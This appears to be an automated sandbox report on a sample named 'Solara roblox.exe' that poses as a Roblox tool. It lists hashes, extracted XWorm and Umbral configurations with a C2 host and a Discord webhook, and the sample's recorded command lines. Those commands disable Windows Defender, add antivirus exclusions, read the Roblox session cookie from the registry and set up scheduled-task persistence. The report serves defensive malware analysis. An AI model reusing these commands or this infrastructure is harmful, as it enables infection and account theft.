Analysis
max time kernel: 1842s
max time network: 1851s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 09-07-2024 12:04
Behavioral task: behavioral1
Sample: Solara roblox.exe
Resource: win7-20240704-en
Behavioral task: behavioral2
Sample: Solara roblox.exe
Resource: win10v2004-20240704-en
General
Target: Solara roblox.exe
Size: 102KB
MD5: ce28d82fa8e4dbbd72cae1bf8d4930e1
SHA1: 0cba2f93bc5c9d9e4f950c66e7ac3acee3ce418f
SHA256: d9ca4eaa59a18b4b30518a5c85c757a8b04240e579a1460f0472c608aa2b7bc2
SHA512: ba5506f4dfa1c46e9ac38ca1c6ffabd1870eb4c99d98dae963dda8c387cc1c423a1cbef09f93befba889a65f8f51f34663f64dbb14743c82d8ec40fc036fe57e
SSDEEP: 3072:Eb1Z3z4aicVw+NUbUq5dikO3WGWlxUJ1lbE812:Eb1ldC+UbUSdiIdnUJfEm
Malware Config
Extracted family: xworm
  127.0.0.1:62559
  19.ip.gl.ply.gg:62559
  Install_directory: %AppData%
  install_file: svchost.exe
Extracted family: umbral
  https://discord.com/api/webhooks/1260178339398684763/vrimjbksRiAdnQJhpf4RiMhDKhDPxfoJKYZ-ILxv3PIxTVVzEhCZeqgCy8f3wVpGOLPx
Signatures
Detect Umbral payload (5 IoCs)
Processes:
  resource  yara_rule
  C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe  family_umbral
  behavioral1/memory/2584-42-0x0000000000A50000-0x0000000000A96000-memory.dmp  family_umbral
  behavioral1/memory/2300-117-0x0000000000B20000-0x0000000000B66000-memory.dmp  family_umbral
  behavioral1/memory/916-161-0x0000000000EC0000-0x0000000000F06000-memory.dmp  family_umbral
  behavioral1/memory/2904-208-0x00000000001F0000-0x0000000000236000-memory.dmp  family_umbral
Detect Xworm Payload (22 IoCs)
StormKitty
StormKitty is an open source info stealer written in C#.
StormKitty payload (1 IoCs)
Processes:
  resource  yara_rule
  behavioral1/memory/2912-82-0x000000001B9C0000-0x000000001BAE0000-memory.dmp  family_stormkitty
Command and Scripting Interpreter: PowerShell (1 TTPs, 8 IoCs)
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.
Processes:
  pid   process
  2456  powershell.exe
  2208  powershell.exe
  2256  powershell.exe
  2872  powershell.exe
  824   powershell.exe
  2916  powershell.exe
  2724  powershell.exe
  3068  powershell.exe
Drops file in Drivers directory (4 IoCs)
Processes:
  description                   ioc                                      process
  File opened for modification  C:\Windows\System32\drivers\etc\hosts    gyfdsf.exe
  File opened for modification  C:\Windows\System32\drivers\etc\hosts    cqswzx.exe
  File opened for modification  C:\Windows\System32\drivers\etc\hosts    Solara.exe
  File opened for modification  C:\Windows\System32\drivers\etc\hosts    iednmj.exe
Drops startup file (2 IoCs)
Processes:
  description                   ioc                                                                                        process
  File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk  Solara roblox.exe
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk  Solara roblox.exe
Executes dropped EXE (35 IoCs)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Adds Run key to start application (2 TTPs, 1 IoCs)
Processes:
  description      ioc                                                                                                                                                    process
  Set value (str)  \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"  Solara roblox.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 8 IoCs)
Processes:
  flow  ioc
  33    discord.com
  34    discord.com
  10    discord.com
  11    discord.com
  19    discord.com
  20    discord.com
  26    discord.com
  27    discord.com
Looks up external IP address via web service (4 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow  ioc
  2     ip-api.com
  15    ip-api.com
  23    ip-api.com
  30    ip-api.com
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Detects videocard installed (1 TTPs, 4 IoCs)
Uses WMIC.exe to determine the installed video card.
Processes:
  pid   process
  1560  wmic.exe
  1304  wmic.exe
  2384  wmic.exe
  2256  wmic.exe
Runs ping.exe (1 TTPs, 4 IoCs)
Processes:
  pid   process
  2644  PING.EXE
  2372  PING.EXE
  1708  PING.EXE
  1924  PING.EXE
Scheduled Task/Job: Scheduled Task (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Suspicious behavior: EnumeratesProcesses (34 IoCs)
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
Processes:
  pid   process
  2912  Solara roblox.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of SetWindowsHookEx (1 IoCs)
Processes:
  pid   process
  2912  Solara roblox.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Views/modifies file attributes (1 TTPs, 4 IoCs)
Processes:
  pid   process
  3016  attrib.exe
  1820  attrib.exe
  1604  attrib.exe
  680   attrib.exe
Processes
C:\Users\Admin\AppData\Local\Temp\Solara roblox.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\Solara roblox.exe"
  - Drops startup file
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Solara roblox.exe'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Solara roblox.exe'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\schtasks.exe
    command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
    - Scheduled Task/Job: Scheduled Task
  C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe"
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\Wbem\wmic.exe
      command line: "wmic.exe" csproduct get uuid
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\attrib.exe
      command line: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe"
      - Views/modifies file attributes
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\Wbem\wmic.exe
      command line: "wmic.exe" os get Caption
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\Wbem\wmic.exe
      command line: "wmic.exe" computersystem get totalphysicalmemory
    C:\Windows\System32\Wbem\wmic.exe
      command line: "wmic.exe" csproduct get uuid
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      - Suspicious behavior: EnumeratesProcesses
    C:\Windows\System32\Wbem\wmic.exe
      command line: "wmic" path win32_VideoController get name
      - Detects videocard installed
    C:\Windows\system32\cmd.exe
      command line: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe" && pause
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\PING.EXE
        command line: ping localhost
        - Runs ping.exe
  C:\Users\Admin\AppData\Local\Temp\cqswzx.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\cqswzx.exe"
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    C:\Windows\System32\Wbem\wmic.exe
      command line: "wmic.exe" csproduct get uuid
    C:\Windows\system32\attrib.exe
      command line: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\cqswzx.exe"
      - Views/modifies file attributes
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cqswzx.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      - Suspicious behavior: EnumeratesProcesses
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      - Suspicious behavior: EnumeratesProcesses
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    C:\Windows\System32\Wbem\wmic.exe
      command line: "wmic.exe" os get Caption
    C:\Windows\System32\Wbem\wmic.exe
      command line: "wmic.exe" computersystem get totalphysicalmemory
    C:\Windows\System32\Wbem\wmic.exe
      command line: "wmic.exe" csproduct get uuid
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      - Suspicious behavior: EnumeratesProcesses
    C:\Windows\System32\Wbem\wmic.exe
      command line: "wmic" path win32_VideoController get name
      - Detects videocard installed
    C:\Windows\system32\cmd.exe
      command line: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\cqswzx.exe" && pause
      C:\Windows\system32\PING.EXE
        command line: ping localhost
        - Runs ping.exe
  C:\Windows\System32\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c start "" "C:\Solara.exe"
    C:\Solara.exe
      command line: "C:\Solara.exe"
      - Drops file in Drivers directory
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      C:\Windows\System32\Wbem\wmic.exe
        command line: "wmic.exe" csproduct get uuid
      C:\Windows\system32\attrib.exe
        command line: "attrib.exe" +h +s "C:\Solara.exe"
        - Views/modifies file attributes
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Solara.exe'
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        - Suspicious behavior: EnumeratesProcesses
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        - Suspicious behavior: EnumeratesProcesses
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        - Suspicious behavior: EnumeratesProcesses
      C:\Windows\System32\Wbem\wmic.exe
        command line: "wmic.exe" os get Caption
      C:\Windows\System32\Wbem\wmic.exe
        command line: "wmic.exe" computersystem get totalphysicalmemory
      C:\Windows\System32\Wbem\wmic.exe
        command line: "wmic.exe" csproduct get uuid
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        - Suspicious behavior: EnumeratesProcesses
      C:\Windows\System32\Wbem\wmic.exe
        command line: "wmic" path win32_VideoController get name
        - Detects videocard installed
      C:\Windows\system32\cmd.exe
        command line: "cmd.exe" /c ping localhost && del /F /A h "C:\Solara.exe" && pause
        C:\Windows\system32\PING.EXE
          command line: ping localhost
          - Runs ping.exe
  C:\Users\Admin\AppData\Local\Temp\iednmj.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\iednmj.exe"
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    C:\Windows\System32\Wbem\wmic.exe
      command line: "wmic.exe" csproduct get uuid
    C:\Windows\system32\attrib.exe
      command line: "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\iednmj.exe"
      - Views/modifies file attributes
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\iednmj.exe'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      - Suspicious behavior: EnumeratesProcesses
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      - Suspicious behavior: EnumeratesProcesses
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      - Suspicious behavior: EnumeratesProcesses
    C:\Windows\System32\Wbem\wmic.exe
      command line: "wmic.exe" os get Caption
    C:\Windows\System32\Wbem\wmic.exe
      command line: "wmic.exe" computersystem get totalphysicalmemory
    C:\Windows\System32\Wbem\wmic.exe
      command line: "wmic.exe" csproduct get uuid
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      - Suspicious behavior: EnumeratesProcesses
    C:\Windows\System32\Wbem\wmic.exe
      command line: "wmic" path win32_VideoController get name
      - Detects videocard installed
    C:\Windows\system32\cmd.exe
      command line: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\iednmj.exe" && pause
      C:\Windows\system32\PING.EXE
        command line: ping localhost
        - Runs ping.exe
C:\Windows\system32\taskeng.exe
  command line: taskeng.exe {90BAF0C2-A960-49BE-9A10-500A906A5ADF} S-1-5-21-3294248377-1418901787-4083263181-1000:FMEDFXFE\Admin:Interactive:[1]
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
  C:\Users\Admin\AppData\Roaming\svchost.exe
    command line: C:\Users\Admin\AppData\Roaming\svchost.exe
    - Executes dropped EXE
MITRE ATT&CK Matrix (ATT&CK v13)
Execution
  Command and Scripting Interpreter (1): PowerShell (1)
  Scheduled Task/Job (1): Scheduled Task (1)
Persistence
  Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
  Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1): Scheduled Task (1)
Downloads
-
C:\Users\Admin\AppData\Local\Temp\ZnsoseXpUGfA3KY\Display\Display.png
Filesize 379KB
MD5 0269b2440881afc8b8a3356afa6912e4
SHA1 ecb66d41f7ac879e741427531a0550273d4cb519
SHA256 b823a59e225449e72c92be97050b53bac5083443902a937e541c49a2fb57c8f3
SHA512 63bae2d774da23dcce52172de418250bdd4d42d7ea0762a8e575048f77cd2b8773b8ad9f6ed77d9f07e58c652a7a868ed085b9d08f5fcca430a1595bb1a7d2f6
-
C:\Users\Admin\AppData\Local\Temp\dlMx2sVADQZsDIe
Filesize 46KB
MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
C:\Users\Admin\AppData\Local\Temp\gyfdsf.exe
Filesize 253KB
MD5 9f3f506175ad4d9550bf1aea609694a7
SHA1 6cc35e30d5b40eb1b5d115feec12ec247a84193f
SHA256 7103785c72f15bc66849b927bb9b0030c2a8383a8f71cd4308b0b42055d8d467
SHA512 b4a691e3b679dac187f1219cff013d3e27a87d55bf10c4744b8aba969a0caac39922dbbf9bce454b87e3e685f5bfa9043ecabacca090650278ab2d081bc2d5cb
-
C:\Users\Admin\AppData\Local\Temp\places.raw
Filesize 5.0MB
MD5 2ef239599179e7e86cf9b5a52e941597
SHA1 fdaea13d732de4776eaf303b51fceb1bbe5f3984
SHA256 c5428bb9ef5434800dc7f53b59aed69314e976549fa2672c3808f45a5b3a5a14
SHA512 1b01dd689adc5555ef4ac4ece779cd8578af0befb3fb59ed56e3d047b86b39f8b0f1c85639bf025041f630cedaf52306309371473aa16bac85433db49442bd76
-
C:\Users\Admin\AppData\Local\Temp\pr2a2xOi3rP4WQL
Filesize 20KB
MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73
-
C:\Users\Admin\AppData\Local\Temp\tmpBF03.tmp.dat
Filesize 92KB
MD5 cf00cf5b059b43e29cbde1a36c6209f3
SHA1 9df2f8ef60997e3934fef0d88f9770fb9d19769f
SHA256 9f861e6046979ac19a569747cd17b7e77a8e1301c870691595a68d9a8244a30a
SHA512 16e433a67de26cbf052f2639df05c5d3d2c5ef5d4ef065b45af913174e08415bd6672f6637e8727e88b2e68c74c2ffeabc6673e1506e8ad397edb198e0276399
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize 7KB
MD5 8f92f318747327f9b8cefb9e7919b13c
SHA1 71f8ad4c44b2ef49dc19244d9e15af656dddbf03
SHA256 fec9ae15ce6644a9fb5776edf7423b1803a762428cb8c2591bdf38ead8422c0b
SHA512 ce473dc287c691e603c606b962ffa9103ebac501915981d88bdeb5232b0fba0a3cb049119f2e8515a870e058ad2dc78c541f7a844d5d7ebd86b01d7991afc7c3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize 7KB
MD5 c82bc064fcf9b0a953cb64a23dc2351d
SHA1 7723ad4a32be99047ffb8a20866f59da167728ac
SHA256 5a760f612cb61e640311f29d7d0e31244fdc4780e33fa5034dbec753362dade9
SHA512 7fa116c45767c5f87cac5e05bf075f0ef69d3e9c7bb7db0185871b95d85d433f1484717ecaab035fe9936ad30750dd28e7ab79559531d05ed35be4f4deb3f09a
-
C:\Users\Admin\AppData\Roaming\svchost.exe
Filesize 102KB
MD5 ce28d82fa8e4dbbd72cae1bf8d4930e1
SHA1 0cba2f93bc5c9d9e4f950c66e7ac3acee3ce418f
SHA256 d9ca4eaa59a18b4b30518a5c85c757a8b04240e579a1460f0472c608aa2b7bc2
SHA512 ba5506f4dfa1c46e9ac38ca1c6ffabd1870eb4c99d98dae963dda8c387cc1c423a1cbef09f93befba889a65f8f51f34663f64dbb14743c82d8ec40fc036fe57e
-
C:\Windows\System32\drivers\etc\hosts
Filesize 2KB
MD5 577f27e6d74bd8c5b7b0371f2b1e991c
SHA1 b334ccfe13792f82b698960cceaee2e690b85528
SHA256 0ade9ef91b5283eceb17614dd47eb450a5a2a371c410232552ad80af4fbfd5f9
SHA512 944b09b6b9d7c760b0c5add40efd9a25197c22e302c3c7e6d3f4837825ae9ee73e8438fc2c93e268da791f32deb70874799b8398ebae962a9fc51c980c7a5f5c
-
\??\PIPE\srvsvc
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-